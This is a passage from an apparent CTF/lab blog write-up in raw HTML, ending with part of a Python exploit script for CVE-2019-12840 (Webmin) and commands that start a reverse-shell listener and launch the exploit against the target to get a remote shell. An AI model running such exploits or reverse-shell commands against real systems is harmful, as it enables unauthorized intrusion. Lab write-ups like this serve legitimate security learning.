style="color:#b8bb26">f</span><span style="color:#b8bb26">&#34;</span><span style="color:#b8bb26">\033</span><span style="color:#b8bb26">[1;31;40m[Error]:</span><span style="color:#b8bb26">\033</span><span style="color:#b8bb26">[0m </span><span style="color:#b8bb26">{</span>msg<span style="color:#b8bb26">}</span><span style="color:#b8bb26">&#34;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> parser <span style="color:#fe8019">=</span> OptionParser() </span></span><span style="display:flex;"><span> parser<span style="color:#fe8019">.</span>usage <span style="color:#fe8019">=</span> <span style="color:#b8bb26">&#34;[-] Usage: ./exploit.py --host http://10.10.10.10:10000 --lhost 10.10.10.2 --lport 9999&#34;</span> </span></span><span style="display:flex;"><span> parser<span style="color:#fe8019">.</span>add_option(<span style="color:#b8bb26">&#34;--host&#34;</span>, dest<span style="color:#fe8019">=</span><span style="color:#b8bb26">&#34;rhost&#34;</span>, <span style="color:#fabd2f">type</span><span style="color:#fe8019">=</span><span style="color:#b8bb26">&#34;string&#34;</span>, help<span style="color:#fe8019">=</span><span style="color:#b8bb26">&#34;target host&#34;</span>) </span></span><span style="display:flex;"><span> parser<span style="color:#fe8019">.</span>add_option( </span></span><span style="display:flex;"><span> <span style="color:#b8bb26">&#34;--lhost&#34;</span>, dest<span style="color:#fe8019">=</span><span style="color:#b8bb26">&#34;lhost&#34;</span>, <span style="color:#fabd2f">type</span><span style="color:#fe8019">=</span><span style="color:#b8bb26">&#34;string&#34;</span>, help<span style="color:#fe8019">=</span><span style="color:#b8bb26">&#34;attacker ip for reverse shell&#34;</span> </span></span><span style="display:flex;"><span> ) </span></span><span style="display:flex;"><span> parser<span style="color:#fe8019">.</span>add_option( </span></span><span style="display:flex;"><span> <span style="color:#b8bb26">&#34;--lport&#34;</span>, </span></span><span style="display:flex;"><span> dest<span style="color:#fe8019">=</span><span style="color:#b8bb26">&#34;lport&#34;</span>, </span></span><span style="display:flex;"><span> <span style="color:#fabd2f">type</span><span style="color:#fe8019">=</span><span style="color:#b8bb26">&#34;int&#34;</span>, </span></span><span style="display:flex;"><span> help<span style="color:#fe8019">=</span><span style="color:#b8bb26">&#34;local port for reverse shell&#34;</span>, </span></span><span style="display:flex;"><span> default<span style="color:#fe8019">=</span><span style="color:#d3869b">6767</span>, </span></span><span style="display:flex;"><span> ) </span></span><span style="display:flex;"><span> (options, args) <span style="color:#fe8019">=</span> parser<span style="color:#fe8019">.</span>parse_args() </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#fe8019">if</span> <span style="color:#fe8019">not</span> options<span style="color:#fe8019">.</span>rhost <span style="color:#fe8019">or</span> <span style="color:#fe8019">not</span> options<span style="color:#fe8019">.</span>lhost: </span></span><span style="display:flex;"><span> <span style="color:#fabd2f">print</span>(parser<span style="color:#fe8019">.</span>usage) </span></span><span style="display:flex;"><span> sys<span style="color:#fe8019">.</span>exit(<span style="color:#d3869b">1</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#fe8019">try</span>: </span></span><span style="display:flex;"><span> exploit(options<span style="color:#fe8019">.</span>rhost, options<span style="color:#fe8019">.</span>lhost, options<span style="color:#fe8019">.</span>lport) </span></span><span style="display:flex;"><span> <span style="color:#fe8019">except</span> <span style="color:#fb4934">Exception</span> <span style="color:#fe8019">as</span> e: </span></span><span style="display:flex;"><span> error(<span style="color:#fabd2f">repr</span>(e)) </span></span></code></pre></div><p>I&rsquo;m using <code>penelope</code> as my reverse shell catcher:</p> <div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>penelope -p <span style="color:#d3869b">9999</span> </span></span></code></pre></div><p>Ran the script:</p> <div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>python exploit.py --host https://$IP:10000/ --lhost 10.10.16.30 --lport <span style="color:#d3869b">9999</span> </span></span></code></pre></div><p>And got the reverse shell!</p> <figure> <img src="https://h4r1337.github.io/img/postman/Pasted%20image%2020260624180718.webp"></figure> <hr> <h3 id="reference">Reference</h3> <ul> <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-12840">https://nvd.nist.gov/vuln/detail/CVE-2019-12840</a></li> <li><a href="https://hacktricks.wiki/en/network-services-pentesting/6379-pentesting-redis.html#ssh">https://hacktricks.wiki/en/network-services-pentesting/6379-pentesting-redis.html#ssh</a></li> <li><a href="https://github.com/zAbuQasem/CVE-2019-12840/blob/main/exploit.py">https://github.com/zAbuQasem/CVE-2019-12840/blob/main/exploit.py</a></li> </ul>